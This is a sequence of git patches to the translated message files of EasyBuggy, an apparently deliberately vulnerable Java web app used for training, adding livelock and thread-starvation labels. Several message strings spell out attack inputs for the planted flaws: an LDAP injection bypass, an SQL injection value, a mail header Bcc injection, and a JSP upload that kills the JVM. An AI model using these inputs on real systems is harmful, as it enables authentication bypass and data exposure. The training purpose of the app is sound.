Java heap space every time you load this page. If keeping on loading this page, OutOfMemoryError is finally thrown. @@ -305,6 +308,7 @@ title.endlesswaiting.page=Execute Batch title.filedescriptorleak.page=Access History title.index.page=EasyBuggy Bootlin title.intoverflow.page=The Distance from Earth to the Moon +title.livelock.page=Thread Dump title.login.page=Login Page for Administrators title.lossoftrailingdigits.page=Decimal Addition title.mailheaderinjection.page=Question to Administrator @@ -327,4 +331,3 @@ title.unrestrictedsizeupload.page=Reverse Color of Image File title.xee.page=Batch Registration of Users title.xss.page=Reverse String title.xxe.page=Batch Update of Users - From 44d05c223976a2718f412336cdce16f2493b9320 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Wed, 16 Oct 2019 21:03:35 +0900 Subject: [PATCH 086/139] New translations messages.properties (French) --- src/main/resources/messages_fr.properties | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/src/main/resources/messages_fr.properties b/src/main/resources/messages_fr.properties index 60a7783..a599c50 100644 --- a/src/main/resources/messages_fr.properties +++ b/src/main/resources/messages_fr.properties @@ -1,4 +1,3 @@ -#X-Generator: crowdin.com description.access.history=Access history in this page (The latest 15 records). description.all=Warning\: Several links cause severe memory leaks or increase CPU usage rate. They can make your computer unstable. The results may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. description.capitalize.string=When you enter a string, the capitalized string is shown. For example\: capitalize string -> Capitalize String @@ -14,6 +13,7 @@ description.reverse.string=When you enter a string, the reversed string is shown description.section.exceptions=Exceptions, extending from java.lang.RuntimeException\: description.send.mail=You can send a mail to the site administrator. description.test.regular.expression=Please test if an input string matches the regular expression ^([a-z0-9]+[-]{0,1}){1,100}$. +description.thread.dump=Thread dump is as follows. description.troubles=Memory leak, infinite loop, deadlock, and so on\: description.vulnerabilities=XSS, SQL Injection, LDAP injection, and so on\: @@ -33,6 +33,7 @@ function.description.infinite.loop=Infinite loop occurs if you click this link. function.description.int.overflow=Integer overflow can occur. function.description.jvm.crash.eav=JVM crashes if you click this link. function.description.ldap.injection=There is an LDAP injection vulnerability in this page. +function.description.live.lock=Livelock (Java) can occur. function.description.loss.of.trailing.digits=Loss of trailing digits can occur. function.description.mail.header.injection=There is a mail header injection vulnerability in this page. function.description.memory.leak=Memory leak occurs in Java heap space every time you load this page. @@ -76,6 +77,7 @@ function.name.infinite.loop=Infinite Loop function.name.int.overflow=Integer Overflow function.name.jvm.crash.eav=JVM Crash function.name.ldap.injection=LDAP Injection +function.name.live.lock=Livelock (Java) function.name.loss.of.trailing.digits=Loss of Trailing Digits function.name.mail.header.injection=Mail Header Injection function.name.memory.leak=Memory Leak (Java heap space) @@ -224,6 +226,7 @@ msg.note.endlesswaiting=If you enter a large number, then an endless waiting pro msg.note.filedescriptorleak=File descriptor leak occurs every time you load this page. msg.note.intoverflow=Integer overflow occurs if you enter a number greater than or equal to 63. msg.note.ldap.injection=You can login with admin and password. You can also bypass authentication and login with *)(|(objectClass\=* and password to aaaaaaa). +msg.note.livelock=Livelock occurs after continuously loading this page few times. msg.note.lossoftrailingdigits=Loss of trailing digits occurs if you enter 0.0000000000000001. msg.note.mailheaderinjection=If you change the input tag of the subject field to a textarea tag by browser's developer mode and set it to [subject][line break]Bcc\: [a mail address], then you can send a mail to the address. msg.note.memoryleak=Memory leak occurs in Java heap space every time you load this page. If keeping on loading this page, OutOfMemoryError is finally thrown. @@ -305,6 +308,7 @@ title.endlesswaiting.page=Execute Batch title.filedescriptorleak.page=Access History title.index.page=EasyBuggy Bootlin title.intoverflow.page=The Distance from Earth to the Moon +title.livelock.page=Thread Dump title.login.page=Login Page for Administrators title.lossoftrailingdigits.page=Decimal Addition title.mailheaderinjection.page=Question to Administrator @@ -327,4 +331,3 @@ title.unrestrictedsizeupload.page=Reverse Color of Image File title.xee.page=Batch Registration of Users title.xss.page=Reverse String title.xxe.page=Batch Update of Users - From 54f7f3209143c3901d5dcce915ea58e681660087 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Wed, 16 Oct 2019 21:03:37 +0900 Subject: [PATCH 087/139] New translations messages.properties (German) --- src/main/resources/messages_de.properties | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/src/main/resources/messages_de.properties b/src/main/resources/messages_de.properties index 60a7783..a599c50 100644 --- a/src/main/resources/messages_de.properties +++ b/src/main/resources/messages_de.properties @@ -1,4 +1,3 @@ -#X-Generator: crowdin.com description.access.history=Access history in this page (The latest 15 records). description.all=Warning\: Several links cause severe memory leaks or increase CPU usage rate. They can make your computer unstable. The results may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. description.capitalize.string=When you enter a string, the capitalized string is shown. For example\: capitalize string -> Capitalize String @@ -14,6 +13,7 @@ description.reverse.string=When you enter a string, the reversed string is shown description.section.exceptions=Exceptions, extending from java.lang.RuntimeException\: description.send.mail=You can send a mail to the site administrator. description.test.regular.expression=Please test if an input string matches the regular expression ^([a-z0-9]+[-]{0,1}){1,100}$. +description.thread.dump=Thread dump is as follows. description.troubles=Memory leak, infinite loop, deadlock, and so on\: description.vulnerabilities=XSS, SQL Injection, LDAP injection, and so on\: @@ -33,6 +33,7 @@ function.description.infinite.loop=Infinite loop occurs if you click this link. function.description.int.overflow=Integer overflow can occur. function.description.jvm.crash.eav=JVM crashes if you click this link. function.description.ldap.injection=There is an LDAP injection vulnerability in this page. +function.description.live.lock=Livelock (Java) can occur. function.description.loss.of.trailing.digits=Loss of trailing digits can occur. function.description.mail.header.injection=There is a mail header injection vulnerability in this page. function.description.memory.leak=Memory leak occurs in Java heap space every time you load this page. @@ -76,6 +77,7 @@ function.name.infinite.loop=Infinite Loop function.name.int.overflow=Integer Overflow function.name.jvm.crash.eav=JVM Crash function.name.ldap.injection=LDAP Injection +function.name.live.lock=Livelock (Java) function.name.loss.of.trailing.digits=Loss of Trailing Digits function.name.mail.header.injection=Mail Header Injection function.name.memory.leak=Memory Leak (Java heap space) @@ -224,6 +226,7 @@ msg.note.endlesswaiting=If you enter a large number, then an endless waiting pro msg.note.filedescriptorleak=File descriptor leak occurs every time you load this page. msg.note.intoverflow=Integer overflow occurs if you enter a number greater than or equal to 63. msg.note.ldap.injection=You can login with admin and password. You can also bypass authentication and login with *)(|(objectClass\=* and password to aaaaaaa). +msg.note.livelock=Livelock occurs after continuously loading this page few times. msg.note.lossoftrailingdigits=Loss of trailing digits occurs if you enter 0.0000000000000001. msg.note.mailheaderinjection=If you change the input tag of the subject field to a textarea tag by browser's developer mode and set it to [subject][line break]Bcc\: [a mail address], then you can send a mail to the address. msg.note.memoryleak=Memory leak occurs in Java heap space every time you load this page. If keeping on loading this page, OutOfMemoryError is finally thrown. @@ -305,6 +308,7 @@ title.endlesswaiting.page=Execute Batch title.filedescriptorleak.page=Access History title.index.page=EasyBuggy Bootlin title.intoverflow.page=The Distance from Earth to the Moon +title.livelock.page=Thread Dump title.login.page=Login Page for Administrators title.lossoftrailingdigits.page=Decimal Addition title.mailheaderinjection.page=Question to Administrator @@ -327,4 +331,3 @@ title.unrestrictedsizeupload.page=Reverse Color of Image File title.xee.page=Batch Registration of Users title.xss.page=Reverse String title.xxe.page=Batch Update of Users - From f02e011c546a47f4d0884e63cb9697559c258733 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Wed, 16 Oct 2019 21:03:40 +0900 Subject: [PATCH 088/139] New translations messages.properties (Japanese) --- src/main/resources/messages_ja.properties | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/src/main/resources/messages_ja.properties b/src/main/resources/messages_ja.properties index dbcc6ad..39f1439 100644 --- a/src/main/resources/messages_ja.properties +++ b/src/main/resources/messages_ja.properties @@ -1,4 +1,3 @@ -#X-Generator: crowdin.com description.access.history=\u3053\u306e\u30da\u30fc\u30b8\u306e\u30a2\u30af\u30bb\u30b9\u5c65\u6b74 (\u6700\u65b0\u306e15\u4ef6) description.all=Warning\: Several links cause severe memory leaks or increase CPU usage rate. They can make your computer unstable. The results may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. description.capitalize.string=When you enter a string, the capitalized string is shown. For example\: capitalize string -> Capitalize String @@ -14,6 +13,7 @@ description.reverse.string=When you enter a string, the reversed string is shown description.section.exceptions=java.lang.RuntimeException\u304b\u3089\u7d99\u627f\u3057\u305f\u4f8b\u5916 description.send.mail=\u30b5\u30a4\u30c8\u306e\u7ba1\u7406\u8005\u306b\u30e1\u30fc\u30eb\u3092\u9001\u4fe1\u3067\u304d\u307e\u3059\u3002 description.test.regular.expression=\u6b63\u898f\u8868\u73fe^([a-z0-9]+[-]{0,1}){1,100}$\u306b\u4e00\u81f4\u3059\u308b\u6587\u5b57\u5217\u304b\u30c6\u30b9\u30c8\u3057\u3066\u4e0b\u3055\u3044\u3002 +description.thread.dump=Thread dump is as follows. description.troubles=\u30e1\u30e2\u30ea\u30ea\u30fc\u30af\u3001\u7121\u9650\u30eb\u30fc\u30d7\u3001\u30c7\u30c3\u30c9\u30ed\u30c3\u30af\u306a\u3069 description.vulnerabilities=XSS\u3001SQL\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u3001LDAP\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u306a\u3069 @@ -33,6 +33,7 @@ function.description.infinite.loop=\u3053\u306e\u30ea\u30f3\u30af\u3092\u30af\u3 function.description.int.overflow=\u6574\u6570\u30aa\u30fc\u30d0\u30fc\u30d5\u30ed\u30fc\u3092\u767a\u751f\u3055\u305b\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002 function.description.jvm.crash.eav=\u3053\u306e\u30ea\u30f3\u30af\u3092\u30af\u30ea\u30c3\u30af\u3059\u308b\u3068JVM\u304c\u30af\u30e9\u30c3\u30b7\u30e5\u3057\u307e\u3059\u3002 function.description.ldap.injection=\u3053\u306e\u30da\u30fc\u30b8\u306b\u306fLDAP\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 +function.description.live.lock=Livelock (Java) can occur. function.description.loss.of.trailing.digits=\u60c5\u5831\u843d\u3061\u3092\u767a\u751f\u3055\u305b\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002 function.description.mail.header.injection=\u3053\u306e\u30da\u30fc\u30b8\u306b\u306f\u30e1\u30fc\u30eb\u30d8\u30c3\u30c0\u30fc\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 function.description.memory.leak=\u3053\u306e\u30da\u30fc\u30b8\u3092\u30ed\u30fc\u30c9\u3059\u308b\u305f\u3073\u306b\u3001Java\u30d2\u30fc\u30d7\u9818\u57df\u306e\u30e1\u30e2\u30ea\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 @@ -76,6 +77,7 @@ function.name.infinite.loop=\u7121\u9650\u30eb\u30fc\u30d7 function.name.int.overflow=\u6574\u6570\u30aa\u30fc\u30d0\u30fc\u30d5\u30ed\u30fc function.name.jvm.crash.eav=JVM\u30af\u30e9\u30c3\u30b7\u30e5 function.name.ldap.injection=LDAP\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3 +function.name.live.lock=Livelock (Java) function.name.loss.of.trailing.digits=\u60c5\u5831\u843d\u3061 function.name.mail.header.injection=\u30e1\u30fc\u30eb\u30d8\u30c3\u30c0\u30fc\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3 function.name.memory.leak=\u30e1\u30e2\u30ea\u30ea\u30fc\u30af (Java\u30d2\u30fc\u30d7\u9818\u57df) @@ -224,6 +226,7 @@ msg.note.endlesswaiting=\u5927\u304d\u306a\u6587\u5b57\u6570\u3092\u5165\u529b\u msg.note.filedescriptorleak=\u3053\u306e\u30da\u30fc\u30b8\u3092\u8aad\u307f\u8fbc\u3080\u305f\u3073\u306b\u3001\u30d5\u30a1\u30a4\u30eb\u30c7\u30a3\u30b9\u30af\u30ea\u30d7\u30bf\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 msg.note.intoverflow=63\u4ee5\u4e0a\u306e\u6570\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u6574\u6570\u30aa\u30fc\u30d0\u30fc\u30d5\u30ed\u30fc\u304c\u767a\u751f\u3057\u307e\u3059\u3002 msg.note.ldap.injection=You can login with admin and password. You can also bypass authentication and login with *)(|(objectClass\=* and password to aaaaaaa). +msg.note.livelock=Livelock occurs after continuously loading this page few times. msg.note.lossoftrailingdigits=0.0000000000000001\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u60c5\u5831\u6b20\u843d\u304c\u767a\u751f\u3057\u307e\u3059\u3002 msg.note.mailheaderinjection=\u30d6\u30e9\u30a6\u30b6\u306e\u958b\u767a\u8005\u30e2\u30fc\u30c9\u3067\u4ef6\u540d\u306einput\u30bf\u30b0\u3092textarea\u30bf\u30b0\u306b\u5909\u66f4\u3057\u3001\u300c[\u4efb\u610f\u4ef6\u540d][\u6539\u884c]Bcc\: [\u4efb\u610f\u30e1\u30fc\u30eb\u30a2\u30c9\u30ec\u30b9]\u300d\u3092\u5165\u529b\u3057\u3066\u9001\u4fe1\u3059\u308b\u3068\u3001[\u4efb\u610f\u30e1\u30fc\u30eb\u30a2\u30c9\u30ec\u30b9]\u306b\u30e1\u30fc\u30eb\u3092\u9001\u4fe1\u3067\u304d\u307e\u3059\u3002 msg.note.memoryleak=Memory leak occurs in Java heap space every time you load this page. If keeping on loading this page, OutOfMemoryError is finally thrown. @@ -305,6 +308,7 @@ title.endlesswaiting.page=\u30d0\u30c3\u30c1\u306e\u5b9f\u884c title.filedescriptorleak.page=\u30a2\u30af\u30bb\u30b9\u5c65\u6b74 title.index.page=EasyBuggy Bootlin title.intoverflow.page=\u6708\u307e\u3067\u306e\u8ddd\u96e2 +title.livelock.page=Thread Dump title.login.page=\u7ba1\u7406\u8005\u30ed\u30b0\u30a4\u30f3\u30da\u30fc\u30b8 title.lossoftrailingdigits.page=\u5c0f\u6570\u306e\u8db3\u3057\u7b97 title.mailheaderinjection.page=\u7ba1\u7406\u8005\u3078\u306e\u554f\u3044\u5408\u308f\u305b @@ -327,4 +331,3 @@ title.unrestrictedsizeupload.page=\u753b\u50cf\u30d5\u30a1\u30a4\u30eb\u306e\u82 title.xee.page=\u30e6\u30fc\u30b6\u30fc\u306e\u4e00\u62ec\u767b\u9332 title.xss.page=\u6587\u5b57\u5217\u306e\u9006\u8ee2 title.xxe.page=\u30e6\u30fc\u30b6\u30fc\u306e\u4e00\u62ec\u66f4\u65b0 - From 4d6bec02325f11dde03e9c044521e0df0401d3c9 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Wed, 16 Oct 2019 21:03:42 +0900 Subject: [PATCH 089/139] New translations messages.properties (Korean) --- src/main/resources/messages_ko.properties | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/src/main/resources/messages_ko.properties b/src/main/resources/messages_ko.properties index 60a7783..a599c50 100644 --- a/src/main/resources/messages_ko.properties +++ b/src/main/resources/messages_ko.properties @@ -1,4 +1,3 @@ -#X-Generator: crowdin.com description.access.history=Access history in this page (The latest 15 records). description.all=Warning\: Several links cause severe memory leaks or increase CPU usage rate. They can make your computer unstable. The results may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. description.capitalize.string=When you enter a string, the capitalized string is shown. For example\: capitalize string -> Capitalize String @@ -14,6 +13,7 @@ description.reverse.string=When you enter a string, the reversed string is shown description.section.exceptions=Exceptions, extending from java.lang.RuntimeException\: description.send.mail=You can send a mail to the site administrator. description.test.regular.expression=Please test if an input string matches the regular expression ^([a-z0-9]+[-]{0,1}){1,100}$. +description.thread.dump=Thread dump is as follows. description.troubles=Memory leak, infinite loop, deadlock, and so on\: description.vulnerabilities=XSS, SQL Injection, LDAP injection, and so on\: @@ -33,6 +33,7 @@ function.description.infinite.loop=Infinite loop occurs if you click this link. function.description.int.overflow=Integer overflow can occur. function.description.jvm.crash.eav=JVM crashes if you click this link. function.description.ldap.injection=There is an LDAP injection vulnerability in this page. +function.description.live.lock=Livelock (Java) can occur. function.description.loss.of.trailing.digits=Loss of trailing digits can occur. function.description.mail.header.injection=There is a mail header injection vulnerability in this page. function.description.memory.leak=Memory leak occurs in Java heap space every time you load this page. @@ -76,6 +77,7 @@ function.name.infinite.loop=Infinite Loop function.name.int.overflow=Integer Overflow function.name.jvm.crash.eav=JVM Crash function.name.ldap.injection=LDAP Injection +function.name.live.lock=Livelock (Java) function.name.loss.of.trailing.digits=Loss of Trailing Digits function.name.mail.header.injection=Mail Header Injection function.name.memory.leak=Memory Leak (Java heap space) @@ -224,6 +226,7 @@ msg.note.endlesswaiting=If you enter a large number, then an endless waiting pro msg.note.filedescriptorleak=File descriptor leak occurs every time you load this page. msg.note.intoverflow=Integer overflow occurs if you enter a number greater than or equal to 63. msg.note.ldap.injection=You can login with admin and password. You can also bypass authentication and login with *)(|(objectClass\=* and password to aaaaaaa). +msg.note.livelock=Livelock occurs after continuously loading this page few times. msg.note.lossoftrailingdigits=Loss of trailing digits occurs if you enter 0.0000000000000001. msg.note.mailheaderinjection=If you change the input tag of the subject field to a textarea tag by browser's developer mode and set it to [subject][line break]Bcc\: [a mail address], then you can send a mail to the address. msg.note.memoryleak=Memory leak occurs in Java heap space every time you load this page. If keeping on loading this page, OutOfMemoryError is finally thrown. @@ -305,6 +308,7 @@ title.endlesswaiting.page=Execute Batch title.filedescriptorleak.page=Access History title.index.page=EasyBuggy Bootlin title.intoverflow.page=The Distance from Earth to the Moon +title.livelock.page=Thread Dump title.login.page=Login Page for Administrators title.lossoftrailingdigits.page=Decimal Addition title.mailheaderinjection.page=Question to Administrator @@ -327,4 +331,3 @@ title.unrestrictedsizeupload.page=Reverse Color of Image File title.xee.page=Batch Registration of Users title.xss.page=Reverse String title.xxe.page=Batch Update of Users - From 1251cbbfa3455ff9301e46454f8ce23b3b4719fa Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Wed, 16 Oct 2019 21:03:44 +0900 Subject: [PATCH 090/139] New translations messages.properties (Russian) --- src/main/resources/messages_ru.properties | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/src/main/resources/messages_ru.properties b/src/main/resources/messages_ru.properties index 60a7783..a599c50 100644 --- a/src/main/resources/messages_ru.properties +++ b/src/main/resources/messages_ru.properties @@ -1,4 +1,3 @@ -#X-Generator: crowdin.com description.access.history=Access history in this page (The latest 15 records). description.all=Warning\: Several links cause severe memory leaks or increase CPU usage rate. They can make your computer unstable. The results may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. description.capitalize.string=When you enter a string, the capitalized string is shown. For example\: capitalize string -> Capitalize String @@ -14,6 +13,7 @@ description.reverse.string=When you enter a string, the reversed string is shown description.section.exceptions=Exceptions, extending from java.lang.RuntimeException\: description.send.mail=You can send a mail to the site administrator. description.test.regular.expression=Please test if an input string matches the regular expression ^([a-z0-9]+[-]{0,1}){1,100}$. +description.thread.dump=Thread dump is as follows. description.troubles=Memory leak, infinite loop, deadlock, and so on\: description.vulnerabilities=XSS, SQL Injection, LDAP injection, and so on\: @@ -33,6 +33,7 @@ function.description.infinite.loop=Infinite loop occurs if you click this link. function.description.int.overflow=Integer overflow can occur. function.description.jvm.crash.eav=JVM crashes if you click this link. function.description.ldap.injection=There is an LDAP injection vulnerability in this page. +function.description.live.lock=Livelock (Java) can occur. function.description.loss.of.trailing.digits=Loss of trailing digits can occur. function.description.mail.header.injection=There is a mail header injection vulnerability in this page. function.description.memory.leak=Memory leak occurs in Java heap space every time you load this page. @@ -76,6 +77,7 @@ function.name.infinite.loop=Infinite Loop function.name.int.overflow=Integer Overflow function.name.jvm.crash.eav=JVM Crash function.name.ldap.injection=LDAP Injection +function.name.live.lock=Livelock (Java) function.name.loss.of.trailing.digits=Loss of Trailing Digits function.name.mail.header.injection=Mail Header Injection function.name.memory.leak=Memory Leak (Java heap space) @@ -224,6 +226,7 @@ msg.note.endlesswaiting=If you enter a large number, then an endless waiting pro msg.note.filedescriptorleak=File descriptor leak occurs every time you load this page. msg.note.intoverflow=Integer overflow occurs if you enter a number greater than or equal to 63. msg.note.ldap.injection=You can login with admin and password. You can also bypass authentication and login with *)(|(objectClass\=* and password to aaaaaaa). +msg.note.livelock=Livelock occurs after continuously loading this page few times. msg.note.lossoftrailingdigits=Loss of trailing digits occurs if you enter 0.0000000000000001. msg.note.mailheaderinjection=If you change the input tag of the subject field to a textarea tag by browser's developer mode and set it to [subject][line break]Bcc\: [a mail address], then you can send a mail to the address. msg.note.memoryleak=Memory leak occurs in Java heap space every time you load this page. If keeping on loading this page, OutOfMemoryError is finally thrown. @@ -305,6 +308,7 @@ title.endlesswaiting.page=Execute Batch title.filedescriptorleak.page=Access History title.index.page=EasyBuggy Bootlin title.intoverflow.page=The Distance from Earth to the Moon +title.livelock.page=Thread Dump title.login.page=Login Page for Administrators title.lossoftrailingdigits.page=Decimal Addition title.mailheaderinjection.page=Question to Administrator @@ -327,4 +331,3 @@ title.unrestrictedsizeupload.page=Reverse Color of Image File title.xee.page=Batch Registration of Users title.xss.page=Reverse String title.xxe.page=Batch Update of Users - From e0952bbb0d173f0c194143b0f47d46c28a1f3959 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Wed, 16 Oct 2019 21:03:46 +0900 Subject: [PATCH 091/139] New translations messages.properties (Spanish) --- src/main/resources/messages_es.properties | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/src/main/resources/messages_es.properties b/src/main/resources/messages_es.properties index 60a7783..a599c50 100644 --- a/src/main/resources/messages_es.properties +++ b/src/main/resources/messages_es.properties @@ -1,4 +1,3 @@ -#X-Generator: crowdin.com description.access.history=Access history in this page (The latest 15 records). description.all=Warning\: Several links cause severe memory leaks or increase CPU usage rate. They can make your computer unstable. The results may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. description.capitalize.string=When you enter a string, the capitalized string is shown. For example\: capitalize string -> Capitalize String @@ -14,6 +13,7 @@ description.reverse.string=When you enter a string, the reversed string is shown description.section.exceptions=Exceptions, extending from java.lang.RuntimeException\: description.send.mail=You can send a mail to the site administrator. description.test.regular.expression=Please test if an input string matches the regular expression ^([a-z0-9]+[-]{0,1}){1,100}$. +description.thread.dump=Thread dump is as follows. description.troubles=Memory leak, infinite loop, deadlock, and so on\: description.vulnerabilities=XSS, SQL Injection, LDAP injection, and so on\: @@ -33,6 +33,7 @@ function.description.infinite.loop=Infinite loop occurs if you click this link. function.description.int.overflow=Integer overflow can occur. function.description.jvm.crash.eav=JVM crashes if you click this link. function.description.ldap.injection=There is an LDAP injection vulnerability in this page. +function.description.live.lock=Livelock (Java) can occur. function.description.loss.of.trailing.digits=Loss of trailing digits can occur. function.description.mail.header.injection=There is a mail header injection vulnerability in this page. function.description.memory.leak=Memory leak occurs in Java heap space every time you load this page. @@ -76,6 +77,7 @@ function.name.infinite.loop=Infinite Loop function.name.int.overflow=Integer Overflow function.name.jvm.crash.eav=JVM Crash function.name.ldap.injection=LDAP Injection +function.name.live.lock=Livelock (Java) function.name.loss.of.trailing.digits=Loss of Trailing Digits function.name.mail.header.injection=Mail Header Injection function.name.memory.leak=Memory Leak (Java heap space) @@ -224,6 +226,7 @@ msg.note.endlesswaiting=If you enter a large number, then an endless waiting pro msg.note.filedescriptorleak=File descriptor leak occurs every time you load this page. msg.note.intoverflow=Integer overflow occurs if you enter a number greater than or equal to 63. msg.note.ldap.injection=You can login with admin and password. You can also bypass authentication and login with *)(|(objectClass\=* and password to aaaaaaa). +msg.note.livelock=Livelock occurs after continuously loading this page few times. msg.note.lossoftrailingdigits=Loss of trailing digits occurs if you enter 0.0000000000000001. msg.note.mailheaderinjection=If you change the input tag of the subject field to a textarea tag by browser's developer mode and set it to [subject][line break]Bcc\: [a mail address], then you can send a mail to the address. msg.note.memoryleak=Memory leak occurs in Java heap space every time you load this page. If keeping on loading this page, OutOfMemoryError is finally thrown. @@ -305,6 +308,7 @@ title.endlesswaiting.page=Execute Batch title.filedescriptorleak.page=Access History title.index.page=EasyBuggy Bootlin title.intoverflow.page=The Distance from Earth to the Moon +title.livelock.page=Thread Dump title.login.page=Login Page for Administrators title.lossoftrailingdigits.page=Decimal Addition title.mailheaderinjection.page=Question to Administrator @@ -327,4 +331,3 @@ title.unrestrictedsizeupload.page=Reverse Color of Image File title.xee.page=Batch Registration of Users title.xss.page=Reverse String title.xxe.page=Batch Update of Users - From e442deb7385c45b34fd45822782fb33f59b38bbe Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Mon, 21 Oct 2019 21:53:25 +0900 Subject: [PATCH 092/139] New translations messages.properties (Chinese Simplified) --- src/main/resources/messages_zh.properties | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/src/main/resources/messages_zh.properties b/src/main/resources/messages_zh.properties index a599c50..b453c33 100644 --- a/src/main/resources/messages_zh.properties +++ b/src/main/resources/messages_zh.properties @@ -1,4 +1,5 @@ description.access.history=Access history in this page (The latest 15 records). +description.access.status=Access Status per IP Address description.all=Warning\: Several links cause severe memory leaks or increase CPU usage rate. They can make your computer unstable. The results may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. description.capitalize.string=When you enter a string, the capitalized string is shown. For example\: capitalize string -> Capitalize String description.design.page=You can change design of this page. Please click one of the links below and change this page to your style. @@ -53,6 +54,7 @@ function.description.slow.string.plus.operation=It takes time to append strings. function.description.slow.unnecessary.object.creation=It takes time to respond due to unnecessary object creation. function.description.sql.injection=There is an SQL injection vulnerability in this page. function.description.thread.leak=Thread leak occurs every time you load this page. +function.description.thread.starvation=Thread starvation can occur. function.description.throwable={0} is thrown if you click this link. function.description.truncation.error=Truncation error can occur. function.description.unintended.file.disclosure=There is an unintended file disclosure vulnerability in this page. @@ -97,6 +99,7 @@ function.name.slow.string.plus.operation=Delay of creating string due to +(plus) function.name.slow.unnecessary.object.creation=Delay due to unnecessary object creation function.name.sql.injection=SQL Injection function.name.thread.leak=Thread Leak +function.name.thread.starvation=Thread Starvation function.name.truncation.error=Truncation Error function.name.unintended.file.disclosure=Unintended File Disclosure function.name.unrestricted.ext.upload=Extension Unrestricted File Upload @@ -107,6 +110,7 @@ function.name.xss=XSS (Cross Site Scripting) function.name.xxe=XXE (XML External Entity) label.access.time=Access Time +label.access.number=Number of Accesses label.attach.file=Attach File label.available.characters=Available Characters label.browser=Browser @@ -124,6 +128,7 @@ label.ip.address=IP Address label.json.string=JSON String label.key=Key label.language=Language +label.last.access.time=Last Access Time label.login=Log in label.login.user.id=Login User ID label.logout=Log out @@ -243,6 +248,7 @@ msg.note.slowregex=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3 msg.note.sqlijc=You can see a secret number if you enter Mark and password. You can see other users information if you enter password to ' OR '1'\='1 msg.note.strplusopr=If you enter a large number, then the processing will take several tens of seconds because the string is created by "+" (plus) operator. msg.note.threadleak=Thread leak occurs every time you load this page. +msg.note.threadstarvation=If you change the permission of {0} from read-write to read-only temporarily and you access to this page, then you can never access to this page even if the permission is restored. msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 or 9. msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, then JavaVM is forcibly finished. msg.note.unrestrictedsizeupload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. @@ -325,6 +331,7 @@ title.slowregex.page=Test Regular Expression title.sqlijc.page=Search Your Secret Number title.strplusopr.page=Random String Generator title.threadleak.page=Display Current Thread Count +title.threadstarvation.page=Access Status title.truncationerror.page=Decimal Division title.unrestrictedextupload.page=Convert Gray Scale of Image File title.unrestrictedsizeupload.page=Reverse Color of Image File From 4902ddd0907e60b08a6c468d4665862c2a821607 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Mon, 21 Oct 2019 21:53:28 +0900 Subject: [PATCH 093/139] New translations messages.properties (English) --- src/main/resources/messages_en.properties | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/src/main/resources/messages_en.properties b/src/main/resources/messages_en.properties index a599c50..b453c33 100644 --- a/src/main/resources/messages_en.properties +++ b/src/main/resources/messages_en.properties @@ -1,4 +1,5 @@ description.access.history=Access history in this page (The latest 15 records). +description.access.status=Access Status per IP Address description.all=Warning\: Several links cause severe memory leaks or increase CPU usage rate. They can make your computer unstable. The results may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. description.capitalize.string=When you enter a string, the capitalized string is shown. For example\: capitalize string -> Capitalize String description.design.page=You can change design of this page. Please click one of the links below and change this page to your style. @@ -53,6 +54,7 @@ function.description.slow.string.plus.operation=It takes time to append strings. function.description.slow.unnecessary.object.creation=It takes time to respond due to unnecessary object creation. function.description.sql.injection=There is an SQL injection vulnerability in this page. function.description.thread.leak=Thread leak occurs every time you load this page. +function.description.thread.starvation=Thread starvation can occur. function.description.throwable={0} is thrown if you click this link. function.description.truncation.error=Truncation error can occur. function.description.unintended.file.disclosure=There is an unintended file disclosure vulnerability in this page. @@ -97,6 +99,7 @@ function.name.slow.string.plus.operation=Delay of creating string due to +(plus) function.name.slow.unnecessary.object.creation=Delay due to unnecessary object creation function.name.sql.injection=SQL Injection function.name.thread.leak=Thread Leak +function.name.thread.starvation=Thread Starvation function.name.truncation.error=Truncation Error function.name.unintended.file.disclosure=Unintended File Disclosure function.name.unrestricted.ext.upload=Extension Unrestricted File Upload @@ -107,6 +110,7 @@ 